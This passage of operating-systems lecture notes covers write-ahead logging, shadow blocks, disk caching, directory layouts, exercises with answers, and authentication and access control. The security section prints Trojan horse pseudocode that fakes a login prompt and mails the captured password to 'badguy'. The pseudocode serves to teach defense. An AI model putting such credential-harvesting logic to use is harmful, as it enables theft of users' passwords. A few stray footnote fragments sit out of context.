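import java.util.*;

// Toy write-ahead log: each UPDATE record carries undo (old value) and redo
// (new value) information and is appended before the data block is changed.
class WriteAheadLog {
    static class LogRecord {
        int txn; String kind; int block; byte[] oldVal, newVal;
        LogRecord(int txn, String kind, int block, byte[] o, byte[] n) {
            this.txn = txn; this.kind = kind; this.block = block; this.oldVal = o; this.newVal = n;
        }
    }

    static List<LogRecord> log = new ArrayList<>();   // stands in for the on-disk log
    static byte[][] disk = new byte[16][4];           // tiny fake disk: 16 blocks of 4 bytes

    static void begin(int txn)  { log.add(new LogRecord(txn, "BEGIN", -1, null, null)); }
    static void commit(int txn) { log.add(new LogRecord(txn, "COMMIT", -1, null, null)); }

    static void update(int txn, int block, byte[] newVal) {
        log.add(new LogRecord(txn, "UPDATE", block, disk[block].clone(), newVal.clone()));
        disk[block] = newVal.clone();                 // change the data only after logging it
    }

    // After a crash, undo (in reverse order) the updates of transactions that
    // have no COMMIT record in the log.
    static void recover() {
        Set<Integer> committed = new HashSet<>();
        for (LogRecord r : log)
            if (r.kind.equals("COMMIT")) committed.add(r.txn);
        for (int i = log.size() - 1; i >= 0; i--) {
            LogRecord r = log.get(i);
            if (r.kind.equals("UPDATE") && !committed.contains(r.txn))
                disk[r.block] = r.oldVal.clone();     // undo an uncommitted change
        }
    }
}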
The other way of implementing transactions is called shadow blocks. Suppose the data structure
on disk is a tree. The basic idea is never to change any block (disk block) of the data structure in
place. Whenever you want to modify a block, make a copy of it (called a shadow of it) instead,
and modify the parent to point to the shadow. Of course, to make the parent point to the shadow
you have to modify it, so instead you make a shadow of the parent and modify that. In this
way, you shadow not only each block you really wanted to modify, but also all the blocks on the
path from it to the root. You keep the shadow of the root block in memory. At the end of the
transaction, you make sure the shadow blocks are all safely written to disk and then write the
shadow of the root directly onto the root block. If the system crashes before you overwrite the
root block, there will be no permanent change to the tree on disk. Overwriting the root block has
the effect of linking all the modified (shadow blocks) into the tree and removing all the old
blocks. Crash recovery is simply a matter of garbage collection. If the crash occurs before the
root was overwritten, all the shadow blocks are garbage. If it occurs after, the blocks they
replaced are garbage. In either case, the tree itself is consistent, and it is easy to find the garbage
blocks (they are blocks that aren't in the tree).
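Here is a small sketch of the shadow idea for a binary tree of blocks kept in memory; the Node class and the path encoding are illustrative assumptions. Nothing is modified in place: updating a leaf copies every node on the path from the root, and the transaction commits by atomically replacing the root.

// Sketch of shadowing: updating a leaf builds a new path of copied nodes and
// returns a new root, leaving the original tree untouched.
class ShadowTree {
    static class Node {
        byte[] data;
        Node left, right;
        Node(byte[] d, Node l, Node r) { data = d; left = l; right = r; }
    }

    // Return a shadow copy of the tree in which the leaf reached by 'path'
    // (false = left, true = right) holds newData. 'path' must lead to an existing leaf.
    static Node updateLeaf(Node root, boolean[] path, int depth, byte[] newData) {
        if (depth == path.length)
            return new Node(newData, null, null);                 // shadow of the leaf itself
        if (!path[depth])                                         // shadow the node on the path, too
            return new Node(root.data, updateLeaf(root.left, path, depth + 1, newData), root.right);
        else
            return new Node(root.data, root.left, updateLeaf(root.right, path, depth + 1, newData));
    }
}

Committing amounts to the single atomic write that replaces the on-disk root block with the shadow root; until that write happens, a crash leaves the original tree intact, and afterwards the old copies of the shadowed blocks are simply garbage.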
Database systems almost universally use logging, and shadowing is mentioned only in passing in
database texts. But the shadowing technique is used in a variant of the UNIX file system called
(somewhat misleadingly) the Log-structured File System (LFS). The entire file system is made
into a tree by replacing the array of inodes with a tree of inodes. LFS has the added advantage
(beyond reliability) that all blocks are written sequentially, so write operations are very fast. It
has the disadvantage that files that are modified here and there by random access tend to have
their blocks scattered about, but that pattern of access is comparatively rare, and there are
techniques to cope with it when it occurs. The main source of complexity in LFS is figuring out
when and how to do the ``garbage collection.''
Performance
The main trick to improve file system performance (like anything else in computer science) is
caching. The system keeps a disk cache (sometimes also called a buffer pool) of recently used
disk blocks. In contrast with the page frames of virtual memory, where there were all sorts of
algorithms proposed for managing the cache, management of the disk cache is pretty simple. On
the whole, it is simply managed LRU (least recently used). Why is it that for paging we went to
great lengths trying to come up with an algorithm that is ``almost as good as LRU'' while here we
can simply use true LRU? The problem with implementing LRU is that some information has to
be updated on every single reference. In the case of paging, references can be as frequent as
every instruction, so we have to make do with whatever information hardware is willing to give
us. The best we can hope for is that the paging hardware will set a bit in a page-table entry. In the
case of file system disk blocks, however, each reference is the result of a system call, and adding
a few extra instructions to a system call for cache maintenance is not unreasonable.
Adding page caching to the file system implementation is actually quite simple. Somewhere in
the implementation, there is probably a procedure that gets called when the system wants to
access a disk block. Let's suppose the procedure simply allocates some memory space to hold the
block and reads it into memory.
Block readBlock(int blockNumber) {
    Block result = new Block();
    Disk.read(blockNumber, result);
    return result;
}
To add caching, all we have to do is modify this code to search the disk cache first.
class CacheEntry {
    int blockNumber;
    Block buffer;
    CacheEntry next, previous;
}

class DiskCache {
    CacheEntry head, tail;

    CacheEntry find(int blockNumber) {
        // Search the list for an entry with a matching block number.
        // If not found, return null.
    }

    void moveToFront(CacheEntry entry) {
        // Move the entry to the head of the list.
    }

    CacheEntry oldest() {
        return tail;
    }

    Block readBlock(int blockNumber) {
        CacheEntry entry = find(blockNumber);
        if (entry == null) {
            entry = oldest();
            Disk.read(blockNumber, entry.buffer);
            entry.blockNumber = blockNumber;
        }
        moveToFront(entry);
        return entry.buffer;
    }
}
This code is not quite right, because it ignores writes. If the oldest buffer is dirty (it has been
modified since it was read from disk), it first has to be written back to the disk before it can be
used to hold the new block. Most systems actually write dirty buffers back to the disk sooner
than necessary to minimize the damage caused by a crash. The original version of UNIX had a
background process that would write all dirty buffers to disk every 30 seconds. Some
information is more critical than others. Some versions of UNIX, for example, write back
directory blocks (the data blocks of files of type directory) each time they are
modified. This technique--keeping the block in the cache but writing its contents back to disk
after any modification--is called write-through caching. (Some modern versions of UNIX use
techniques inspired by database transactions to minimize the effects of crashes).
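As an illustration of the dirty-buffer handling described above, here is a self-contained sketch of a write-back cache with LRU replacement. It uses Java's LinkedHashMap in access order instead of the hand-built list in the code above, and the Block and FakeDisk classes here are trivial stand-ins so the example runs on its own.

import java.util.*;

class Block {                                           // stand-in for the Block class used above
    byte[] data = new byte[512];
}

class FakeDisk {                                        // stand-in for the real Disk interface
    static Map<Integer, Block> blocks = new HashMap<>();
    static Block read(int n)          { return blocks.getOrDefault(n, new Block()); }
    static void write(int n, Block b) { blocks.put(n, b); }
}

// Write-back cache: dirty blocks reach the disk only on eviction or sync().
class WriteBackCache {
    static final int CAPACITY = 64;
    // an access-ordered LinkedHashMap gives us LRU ordering for free
    private final LinkedHashMap<Integer, Block> cache = new LinkedHashMap<>(CAPACITY, 0.75f, true);
    private final Set<Integer> dirty = new HashSet<>();

    private void evictIfFull() {
        if (cache.size() < CAPACITY) return;
        int victim = cache.keySet().iterator().next();  // least recently used entry
        Block b = cache.remove(victim);
        if (dirty.remove(victim))
            FakeDisk.write(victim, b);                  // write back only if modified
    }

    Block readBlock(int blockNumber) {
        Block b = cache.get(blockNumber);
        if (b == null) {
            evictIfFull();
            b = FakeDisk.read(blockNumber);
            cache.put(blockNumber, b);
        }
        return b;
    }

    void writeBlock(int blockNumber, Block data) {
        if (!cache.containsKey(blockNumber))
            evictIfFull();
        cache.put(blockNumber, data);
        dirty.add(blockNumber);                         // reaches disk on eviction or sync
    }

    void sync() {                                       // like UNIX's periodic flush of dirty buffers
        for (int n : dirty)
            FakeDisk.write(n, cache.get(n));
        dirty.clear();
    }
}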
LRU management automatically does the ``right thing'' for most disk blocks. If someone is
actively manipulating the files in a directory, all of the directory's blocks will probably be in the
cache. If a process is scanning a large file, all of its indirect blocks will probably be in memory
most of the time. But there is one important case where LRU is not the right policy. Consider a
process that is traversing (reading or writing) a file sequentially from beginning to end. Once that
process has read or written the last byte of a block, it will not touch that block again. The system
might as well immediately move the block to the tail of the list as soon as the read or write
request completes. Tanenbaum calls this technique free behind. It is also sometimes called most
recently used (MRU) to contrast it with LRU. How does the system know to handle certain
blocks MRU? There are several possibilities.
• If the operating system interface distinguishes between random-access files and sequential files, it is easy. Data blocks of sequential files should be managed MRU.
• In some systems, all files are alike, but there is a different kind of open call, or a flag passed to open, that indicates whether the file will be accessed randomly or sequentially.
• Even if the OS gets no explicit information from the application program, it can watch the pattern of reads and writes. If recent history indicates that all (or most) reads or writes of the file have been sequential, the data blocks should be managed MRU.
A similar trick is called read-ahead. If a file is being read sequentially, it is a good idea to read a
few blocks at a time. This cuts down on the latency for the application (most of the time the data
the application wants is in memory before it even asks for it). If the disk hardware allows
multiple blocks to be read at a time, it can cut the number of disk read requests, cutting down on
overhead such as the time to service an I/O completion interrupt. If the system has done a good
job of clustering together the blocks of the file, read-ahead also takes better advantage of the
clustering. If the system reads one block at a time, another process, accessing a different file,
could make the disk head move away from the area containing the blocks of this file between
accesses.
The Berkeley file system introduced another trick to improve file system performance. They
divided the disk into chunks, which they called cylinder groups (CGs) because each one is
comprised of some number of adjacent cylinders. Each CG is like a miniature disk. It has its own
super block and array of inodes. The system attempts to put all the blocks of a file in the same
CG as its inode. It also tries to keep all the inodes in one directory together in the same CG so
that operations like
ls -l *
will be fast. It uses a variety of techniques to assign inodes and blocks to CGs in such a way as
to distribute the free space fairly evenly between them, so there will be enough room to do this
clustering. In particular,
• When a new file is created, its inode is placed in the same CG as its parent directory (if possible). But when a new directory is created, its inode is placed in the CG with the largest amount of free space (so that the files in the directory will be able to be near each other).
• When blocks are added to a file, they are allocated (if possible) from the same CG that contains its inode. But when the size of the file crosses certain thresholds (say every megabyte or so), the system switches to a different CG, one that is relatively empty. The idea is to prevent a big file from hogging all the space in one CG and preventing other files in the CG from being well clustered.
This Java declaration is actually a bit of a lie. In Java, an instance of class Dirent would include
some header information indicating that it is a Dirent object, a two-byte short integer, and a
pointer to an array object (which contains information about its type and length, in addition to the
14 bytes of data). The actual representation is given by the C (or C++) declaration
struct direct {
    unsigned short int inumber;
    char name[14];
};
Unfortunately, there's no way to represent this in Java.
The DirentLong declaration is also a lie, in that the field byte name[] is intended to indicate an
array of indeterminate length, rather than a pointer to an array. The actual C declaration is
struct dirent {
    unsigned long int inumber;
    unsigned short int reclen;
    unsigned short int namelen;
    char name[256];
};
The array size 256 is a lie. The code depends on the fact that the C language does not do any
array bounds checking. The dictionary defines epoch as an instant of time or a date selected as a
point of reference in astronomy.
Critical sections are usually implemented so that they actually occur one after the other, but all
that is required is that they behave as if they were serialized. For example, if neither transaction
modifies anything, or if they don't touch any overlapping data, they can be run concurrently
without any harm. Database implementations of transactions go to a great deal of trouble to
allow as much concurrency as possible.
7.6 Exercises
1. Researchers have suggested that, instead of having an access list associated with each file
(specifying which users can access the file, and how), we should have a user control list
associated with each user (specifying which files a user can access, and how). Discuss the
relative merits of these two schemes.
Answer:
• File access list (one list per file): since the access control information for a file is concentrated in one place, it is easier to change, and it requires less space.
• User control list (one list per user): this requires less overhead when opening a file.
2. Consider a file currently consisting of 100 blocks. Assume that the file control block (and the
index block, in the case of indexed allocation) is already in memory. Calculate how many
disk I/O operations are required for contiguous, linked, and indexed (single-level) allocation
strategies, if, for one block, the following conditions hold. In the contiguous-allocation case,
assume that there is no room to grow in the beginning, but there is room to grow in the end.
Assume that the block information to be added is stored in memory.
(a) The block is added at the beginning.
(b) The block is added in the middle.
(c) The block is added at the end.
(d) The block is removed from the beginning.
(e) The block is removed from the middle.
(f) The block is removed from the end.
Answer:
        Contiguous   Linked   Indexed
(a)        201          1        1
(b)        101         52        1
(c)          1          3        1
(d)        198          1        0
(e)         98         52        0
(f)          0        100        0
3. What problems could occur if a system allowed a file system to be mounted simultaneously
at more than one location?
Answer:
There would be multiple paths to the same file, which could confuse users or encourage
mistakes (deleting a file with one path deletes the file in all the other paths).
4. Why must the bitmap for file allocation be kept on mass storage, rather than in main
memory?
Answer:
In case of a system crash (memory failure), the free-space information would not be lost, as it
would be if the bitmap had been stored only in main memory.
5. Consider a system that supports the strategies of contiguous, linked, and indexed allocation.
What criteria should be used in deciding which strategy is best utilized for a particular file?
Answer:
• Contiguous - if the file is usually accessed sequentially and is relatively small.
• Linked - if the file is large and usually accessed sequentially.
• Indexed - if the file is large and usually accessed randomly.
8. Protection and Security
The terms protection and security are often used together, and the distinction between them is a
bit blurred, but security is generally used in a broad sense to refer to all concerns about
controlled access to facilities, while protection describes specific technological mechanisms that
support security.
8.1 User Security
As in any other area of software design, it is important to distinguish between policies and
mechanisms. Before you can start building machinery to enforce policies, you need to establish
what policies you are trying to enforce. Many years ago, there was a story about a software firm
that was hired by a small savings and loan corporation to build a financial accounting system.
The chief financial officer used the system to embezzle millions of dollars and fled the country.
The losses were so great the S&L went bankrupt, and the loss of the contract was so bad the
software company also went belly-up. Did the accounting system have a good or bad security
design? The problem wasn't unauthorized access to information, but rather authorization to the
wrong person. The situation is analogous to the old saw that every program is correct according
to some specification. Unfortunately, we don't have the space to go into the whole question
of security policies here. We will just assume that terms like ``authorized access'' have some
well-defined meaning in a particular context.
Threats
Any discussion of security must begin with a discussion of threats. After all, if you don't know
what you're afraid of, how are you going to defend against it? Threats are generally divided into
three main categories.
• Unauthorized disclosure. A ``bad guy'' gets to see information he has no right to see
(according to some policy that defines ``bad guy'' and ``right to see'').
• Unauthorized updates. The bad guy makes changes he has no right to make.
• Denial of service. The bad guy interferes with legitimate access by other users.
There is a wide spectrum of denial-of-service threats. At one end, it overlaps with the previous
category. A bad guy deleting a good guy's file could be considered an unauthorized update. At the
other end of the spectrum, blowing up a computer with a hand grenade is not usually considered
an unauthorized update. As this second example illustrates, some denial-of-service threats can
only be countered by physical security. No matter how well your OS is designed, it can't protect
your files from a hand grenade. Another form of denial-of-service threat comes from
unauthorized consumption of resources, such as filling up the disk, tying up the CPU with an
infinite loop, or crashing the system by triggering some bug in the OS. While there are software
defenses against these threats, they are generally considered in the context of other parts of the
OS rather than security and protection. In short, discussion of software mechanisms for computer
security generally focuses on the first two threats.
In response to these threats, countermeasures also fall into various categories. As programmers,
we tend to think of technological tricks, but it is also important to realize that a complete security
design must involve physical components (such as locking the computer in a secure building
with armed guards outside) and human components (such as a background check to make sure
your CFO isn't a crook, or checking to make sure those armed guards aren't taking bribes).
The Trojan Horse
Break-in techniques come in numerous forms. One general category of attack that comes in a
great variety of disguises is the Trojan Horse scam. The name comes from Greek mythology.
The ancient Greeks were attacking the city of Troy, which was surrounded by an impenetrable
wall. Unable to get in, they left a huge wooden horse outside the gates as a ``gift'' and pretended
to sail away. The Trojans brought the horse into the city, where they discovered that the horse
was filled with Greek soldiers who defeated the Trojans to win the Rose Bowl (oops, wrong
story). In software, a Trojan Horse is a program that does something useful--or at least appears to
do something useful--but also subverts security somehow. In the personal computer world,
Trojan horses are often computer games infected with ``viruses.''
Here's the simplest Trojan Horse attack: log onto a public terminal and start a program that
does something like this:
print("login:");                   // imitate the system's normal login prompt
name = readALine();
turnOffEchoing();                  // real login programs also suppress echoing
print("password:");
passwd = readALine();              // capture the victim's password
sendMail("badguy",name,passwd);    // ship the stolen credentials to the attacker
print("login incorrect");          // look like an ordinary typo and give up
exit();
A user walking up to the terminal will think it is idle. He will attempt to log in, typing his login
name and password. The Trojan Horse program sends this information to the bad guy, prints the
message login incorrect and exits. After the program exits, the system will generate a legitimate
login: message and the user, thinking he mistyped his password (a common occurrence because
the password is not echoed) will try again, log in successfully, and have no suspicion that
anything was wrong. Note that the Trojan Horse program doesn't actually have to do anything
useful; it just has to appear to.
Design Principles
• Public Design. A common mistake is to try to keep a system secure by keeping its
algorithms secret. That's a bad idea for many reasons. First, it gives a kind of all-or-nothing
security: as soon as anybody learns about the algorithm, security is all gone. In
the words of Benjamin Franklin, ``Three may keep a secret, if two of them are dead.''
Second, it is usually not that hard to figure out the algorithm by seeing how the system
responds to various inputs, decompiling the code, etc. Third, publishing the algorithm can
have beneficial effects. The bad guys have probably already figured out your algorithm
and found its weak points. If you publish it, perhaps some good guys will notice bugs or
loopholes and tell you about them so you can fix them.
• Default is No Access. Start out by granting as little access as possible and adding privileges
only as needed. If you forget to grant access where it is legitimately needed, you'll soon
find out about it. Users seldom complain about having too much access.
• Timely Checks. Checks tend to ``wear out.'' For example, the longer you use the same
password, the higher the likelihood that it will be stolen or deciphered. Be careful: this
principle can be overdone. Systems that force users to change passwords frequently
encourage them to use particularly bad ones. A system that forced users to supply a
password every time they wanted to open a file would inspire all sorts of ingenious ways
to avoid the protection mechanism altogether.
• Minimum Privilege. This is an extension of the ``Default is No Access'' principle. A person
(or program or process) should be given just enough power to get the job done. In other
contexts, this principle is called ``need to know.'' It implies that the protection mechanism
has to support fine-grained control.
• Simple, Uniform Mechanisms. Any piece of software should be as simple as possible
(but no simpler!) to maximize the chances that it is correctly and efficiently implemented.
This is particularly important for protection software, since bugs are likely to be usable as
security loopholes. It is also important that the interface to the protection mechanisms be
simple, easy to understand, and easy to use. It is remarkably hard to design good,
foolproof security policies; policy designers need all the help they can get.
• Appropriate Levels of Security. You don't store your best silverware in a box on the front
lawn, but you also don't keep it in a vault at the bank. The US Strategic Air Defense calls
for a different level of security than the records of grades for this course. Not only does an
excessive security mechanism add unnecessary cost and performance degradation, it
can actually lead to a less secure system: if the protection mechanisms are too hard to
use, users will go out of their way to avoid using them.
Authentication
Authentication is a process by which one party convinces another of its identity. A familiar
instance is the login process, through which a human user convinces the computer system that he
has the right to use a particular account. If the login is successful, the system creates a process
and associates with it the internal identifier that identifies the account. Authentication occurs in
other contexts, and it isn't always a human being that is being authenticated. Sometimes a
process needs to authenticate itself to another process. In a networking environment, a computer
may need to authenticate itself to another computer. In general, let's call the party that wants to
be authenticated the client and the other party the server.
One common technique for authentication is the use of a password. This is the technique used
most often for login. There is a value, called the password, that is known to both the server and to
legitimate clients. The client tells the server who he claims to be and supplies the password as
proof. The server compares the supplied password with what it knows to be the true password
for that user.
Although this is a common technique, it is not a very good one. There are lots of things wrong
with it.
Direct attacks on the password.
The most obvious way of breaking in is a frontal assault on the password. Simply try all possible
passwords until one works. The main defense against this attack is the time it takes to try lots of
possibilities. If the client is a computer program (perhaps masquerading as a human being), it can
try lots of combinations very quickly, but if the password is long enough, even the fastest
computer cannot succeed in a reasonable amount of time. If the password is a string of 8
letters and digits, there are 2,821,109,907,456 possibilities. A program that tried one combination
every millisecond would take 89 years to get through them all. If users are allowed to pick their
own passwords, they are likely to choose ``cute doggie names'', common words, names of family
members, etc. That cuts down the search space considerably. A password cracker can go through
dictionaries, lists of common names, etc. It can also use biographical information about the user
to narrow the search space. There are several defenses against this sort of attack.
• The system chooses the password. The problem with this is that the password will not be
easy to remember, so the user will be tempted to write it down or store it in a file, making
it easy to steal. This is not a problem if the client is not a human being.
• The system rejects passwords that are too ``easy to guess.'' In effect, it runs a password
cracker when the user tries to set his password and rejects the password if the cracker
succeeds. This has many of the disadvantages of the previous point. Besides, it leads to a
sort of arms race between crackers and checkers.
• The password check is artificially slowed down, so that it takes longer to go through lots
of possibilities. One variant of this idea is to hang up a dial-in connection after three
unsuccessful login attempts, forcing the bad guy to take the time to redial.
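As a quick check on the figures quoted above, the short Python sketch below recomputes the size of
the search space and the time needed at the one-guess-per-millisecond rate assumed in the text; the
numbers in it are just those illustrative assumptions, not properties of any real system.

# Back-of-the-envelope estimate for brute-forcing an 8-character password
# drawn from 26 letters + 10 digits.
alphabet_size = 36
length = 8

combinations = alphabet_size ** length        # 2,821,109,907,456 possibilities
guesses_per_second = 1000                     # one guess per millisecond, as in the text

seconds = combinations / guesses_per_second
years = seconds / (60 * 60 * 24 * 365)

print(f"{combinations:,} combinations")                # 2,821,109,907,456 combinations
print(f"about {years:.0f} years to try them all")      # about 89 years to try them all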
Eavesdropping.
This is a far bigger problem for passwords than brute-force attacks. It comes in many disguises.
• Looking over someone's shoulder while he's typing his password. Most systems turn off
echoing, or echo each character as an asterisk, to mitigate this problem.
• Reading the password file. In order to verify that the password is correct, the server has to
have it stored somewhere. If the bad guy can somehow get access to this file, he can pose
as anybody. While this isn't a threat on its own (after all, why should the bad guy have
access to the password file in the first place?), it can magnify the effects of an existing
security lapse.
UNIX introduced a clever fix to this problem that has since been almost universally
copied. Use some hash function f and, instead of storing password, store f(password). The
hash function should have two properties: like any hash function, it should generate all
possible result values with roughly equal probability, and in addition it should be very
hard to invert--that is, given f(password), it should be hard to recover password. Functions
with these properties (one-way hash functions) are readily available. When a client sends
his password, the server applies f to it and compares the result with the value stored in the
password file. Since only f(password) is stored in the password file, nobody can find out
the password for a given user, even with full access to the password file, and logging in
requires knowing password, not f(password). In fact, this technique was long considered
so secure that the password file was customarily made publicly readable (modern systems
instead keep the hashes in a protected ``shadow'' file and add a per-user salt before
hashing). A small code sketch of this scheme appears after this list.
• Wire tapping. If the bad guy can somehow intercept the information sent from the client
to the server, password-based authentication breaks down altogether. It is increasingly the
case that authentication occurs over an insecure channel such as a dial-up line or a
local-area network. Note that the UNIX scheme of storing f(password) is of no help here,
since the password is sent in its original form (``plaintext'' in the jargon of encryption)
from the client to the server. We will consider this problem in more detail below.
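To make the hashed-password idea concrete, here is a minimal sketch in Python of how a server could
store and check f(password). The function names and the in-memory ``password file'' are purely
illustrative; real systems also add a per-user salt and use a deliberately slow password hash rather
than a bare SHA-256.

import hashlib

# Illustrative in-memory "password file": user name -> f(password).
password_file = {}

def f(password: str) -> str:
    """One-way hash: easy to compute, hard to invert."""
    return hashlib.sha256(password.encode()).hexdigest()

def set_password(user: str, password: str) -> None:
    # Only the hash is stored; the cleartext password is never kept.
    password_file[user] = f(password)

def check_login(user: str, password: str) -> bool:
    # Hash the supplied password and compare it with the stored hash.
    return password_file.get(user) == f(password)

set_password("solomon", "correct horse battery staple")
print(check_login("solomon", "correct horse battery staple"))  # True
print(check_login("solomon", "guess"))                         # False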
Spoofing.
This is the worst threat of all. How does the client know that the server is who it appears to be? If
the bad guy can pose as the server, he can trick the client into divulging his password. We saw a
form of this attack above. It would seem that the server needs to authenticate itself to the client
before the client can authenticate itself to the server. Clearly, there's a chicken-and-egg problem
here. Fortunately, there's a very clever and general solution to this problem.
Challenge-response.
There is a wide variety of authentication protocols, but they are all based on a simple idea. As
before, we assume that there is a password known to both the (true) client and the (true) server.
Authentication is a four-step process.
1. The client sends a message to the server saying who he claims to be and requesting
authentication.
2. The server sends a challenge to the client consisting of some random value x.
3. The client computes g(password,x) and sends it back as the response. Here g is a hash
function similar to the function f above, except that it has two arguments. It should have
the property that it is essentially impossible to figure out password even if you know both
x and g(password,x).
4. The server also computes g(password,x) and compares it with the response it got from the
client.
Clearly this algorithm works if both the client and server are legitimate. An eavesdropper could
learn the user's name, x and g(password,x), but that wouldn't help him pose as the user. If he
tried to authenticate himself to the server he would get a different challenge x', and would have
no way to respond. Even a bogus server is no threat. The exchange provides it with no useful
information. Similarly, a bogus client does no harm to a legitimate server except for tying him up
in a useless exchange (a denial-of-service problem!).
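Here is a minimal Python sketch of the protocol, using an HMAC over the challenge as the
two-argument function g; the names and the shared password are illustrative only, not taken from
any particular system.

import hmac
import hashlib
import secrets

def g(password: str, challenge: bytes) -> str:
    """Two-argument hash: infeasible to recover password from (x, g(password, x))."""
    return hmac.new(password.encode(), challenge, hashlib.sha256).hexdigest()

# Shared secret known to the true client and the true server.
PASSWORD = "squeamish ossifrage"

# Step 1: the client announces who it claims to be (omitted here).
# Step 2: the server sends a fresh random challenge x.
x = secrets.token_bytes(16)

# Step 3: the client computes the response from the password and the challenge.
response = g(PASSWORD, x)

# Step 4: the server recomputes g(password, x) and compares, in constant time.
server_value = g(PASSWORD, x)
print(hmac.compare_digest(response, server_value))   # True for a legitimate client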
Protection Mechanisms
Before looking at the protection mechanisms, let's have a look at some terminology:
objects
The things to which we wish to control access. They include physical (hardware) objects
as well as software objects such as files, databases, semaphores, or processes. As in
object-oriented programming, each object has a type and supports certain operations as
defined by its type. In simple protection systems, the set of operations is quite limited:
read, write, and perhaps execute, append, and a few others. Fancier protection systems
support a wider variety of types and operations, perhaps allowing new types and
operations to be dynamically defined.
principals
Intuitively, ``users''--the ones who do things to objects. Principals might be individual
persons, groups or projects, or roles, such as ``administrator.'' Often each process is
associated with a particular principal, the owner of the process.
rights
Permissions to invoke operations. Each right is the permission for a particular principal to
perform a particular operation on a particular object. For example, principal solomon
might have read rights for a particular file object.
domains
Sets of rights. Domains may overlap. Domains are a form of indirection, making it easier
to make wholesale changes to the access environment of a process. There may be three
levels of indirection: A principal owns a particular process, which is in a particular
domain, which contains a set of rights, such as the right to modify a particular file.
Conceptually, the protection state of a system is defined by an access matrix. The rows
correspond to principals (or domains), the columns correspond to objects, and each cell is a set of
rights. For example, if access[solomon]["/tmp/foo"] = { read, write }, then principal solomon has read
and write access to the file "/tmp/foo". We say ``conceptually'' because the access matrix is never
actually stored anywhere. It is very large and has a great deal of redundancy (for example, a typical
principal's rights to the vast majority of objects are exactly the same: none!), so there are much
more compact ways to represent it. The
access information is represented in one of two ways, by columns, which are called access
control lists (ACLs), and by rows, called capability lists.
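To make the two representations concrete, here is a minimal Python sketch; the principals, objects,
and rights shown are invented for illustration.

# The conceptual access matrix, stored sparsely in two equivalent ways.

# By column: one access control list (ACL) per object.
acls = {
    "/tmp/foo":  {"solomon": {"read", "write"}, "anyuser": {"read"}},
    "/etc/motd": {"anyuser": {"read"}},
}

# By row: one capability list per principal.
capabilities = {
    "solomon": {"/tmp/foo": {"read", "write"}, "/etc/motd": {"read"}},
    "anyuser": {"/tmp/foo": {"read"}, "/etc/motd": {"read"}},
}

def allowed_by_acl(principal: str, obj: str, right: str) -> bool:
    # ACL check: look up the object, then the principal's entry in its list.
    return right in acls.get(obj, {}).get(principal, set())

def allowed_by_capability(principal: str, obj: str, right: str) -> bool:
    # Capability check: look up the principal, then the rights it holds for the object.
    return right in capabilities.get(principal, {}).get(obj, set())

print(allowed_by_acl("solomon", "/tmp/foo", "write"))        # True
print(allowed_by_capability("anyuser", "/tmp/foo", "write")) # False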
8.2 Access Control Lists
An ACL (pronounced ``ackle'') is a list of rights associated with an object. A good example of
the use of ACLs is the Andrew File System (AFS) originally created at Carnegie-Mellon
University and later marketed by Transarc Corporation as an add-on to UNIX. AFS
associates an ACL with each directory, but the ACL also defines the rights for all the files in the
directory (in effect, they all share the same ACL). You can list the ACL of a directory with the fs
listacl command:
% fs listacl /u/c/s/cs537-1/public
Access list for /u/c/s/cs537-1/public is
Normal rights:
system:administrators rlidwka
system:anyuser rl
solomon rlidwka
The entry system:anyuser rl means that the principal system:anyuser (which represents the role
``anybody at all'') has rights r (read files in the directory) and l (list the files in the directory and
read their attributes). The entry solomon rlidwka means that the principal solomon has all seven
rights supported by AFS. In addition to r and l, they include the rights to insert new files into the
directory (i.e., create files), delete files, write files, lock files, and administer the ACL itself. This
last right is very powerful: it allows the holder to add, delete, or modify ACL entries, and thus to
grant or deny any rights to this directory to anybody. The remaining entry in the list shows that
the principal system:administrators has the same rights as solomon, namely all rights. This principal is
the name of a group of other principals. The command pts membership system:administrators lists
the members of the group.
Ordinary UNIX also uses an ACL scheme to control access to files, but in a much stripped-down
form. Each process is associated with a user identifier (uid) and a group identifier (gid), each of
which is a 16-bit unsigned integer. The inode of each file also contains a uid and a gid, as well as
a nine-bit protection mask, called the mode of the file. The mask is composed of three groups of
three bits. The first group indicates the rights of the owner: one bit each for read access, write
access, and execute access (the right to run the file as a program). The second group similarly
lists the rights of the file's group, and the remaining three bits indicate the rights of
everybody else. For example, the mode 111 101 101 (0755 in octal) means that the owner can
read, write, and execute the file, while members of the owning group and others can read and
execute, but not write, the file. Programs that print the mode usually use the characters r, w, and x
rather than 0 and 1. Each zero in the binary value is represented by a dash, and each 1 is
represented by r, w, or x, depending on its position. For example, the mode 111101101 is printed
as rwxr-xr-x.
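As a small illustration (the helper function below is written just for this text, not part of any
UNIX API), a Python sketch that converts a nine-bit mode into the familiar rwx notation:

def mode_string(mode: int) -> str:
    """Render a nine-bit UNIX protection mask as rwxrwxrwx notation."""
    out = []
    # Walk the bits from the owner's read bit (bit 8) down to the others' execute bit (bit 0).
    for shift, letter in zip(range(8, -1, -1), "rwxrwxrwx"):
        out.append(letter if mode & (1 << shift) else "-")
    return "".join(out)

print(mode_string(0o755))  # rwxr-xr-x
print(mode_string(0o046))  # ---r--rw-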
In somewhat more detail, the access-checking algorithm is as follows: The first three bits are
checked to determine whether an operation is allowed if the uid of the file matches the uid of the
process trying to access it. Otherwise, if the gid of the file matches the gid of the process, the
second three bits are checked. If neither ID matches, the last three bits are used. The code
might look something like this.
boolean accessOK(Process p, Inode i, int operation) {
    int mode;
    if (p.uid == i.uid)
        mode = i.mode >> 6;      // owner: use the high-order three bits
    else if (p.gid == i.gid)
        mode = i.mode >> 3;      // group: use the middle three bits
    else
        mode = i.mode;           // everybody else: use the low-order three bits
    switch (operation) {
        case READ:    mode &= 4; break;   // keep only the r bit
        case WRITE:   mode &= 2; break;   // keep only the w bit
        case EXECUTE: mode &= 1; break;   // keep only the x bit
    }
    return (mode != 0);
}
(The expression i.mode >> 3 denotes the value i.mode shifted right by three bit positions and
the operation mode &= 4 clears all but the third bit from the right of mode.) Note that this
scheme can actually give a random user more powers over the file than its owner. For example,
the mode ---r--rw- (000 100 110 in binary) means that the owner cannot access the file at all,
while members of the group can only read the file, and others can both read and write. On the
other hand, the owner of the file (and only the owner) can execute the chmod system call, which
changes the mode bits to any desired value. When a new file is created, it gets the uid and gid of
the process that created it, and a mode supplied as an argument to the creat system call.
Most modern versions of UNIX actually implement a slightly more flexible scheme for groups.
A process has a set of gids, and the check of whether the file is in the process's group tests
whether any of the process's gids match the file's gid.
boolean accessOK(Process p, Inode i, int operation) {
    int mode;
    if (p.uid == i.uid)
        mode = i.mode >> 6;
    else if (p.gidSet.contains(i.gid))   // the only change: match against the set of gids
        mode = i.mode >> 3;
    else
        mode = i.mode;
    switch (operation) {
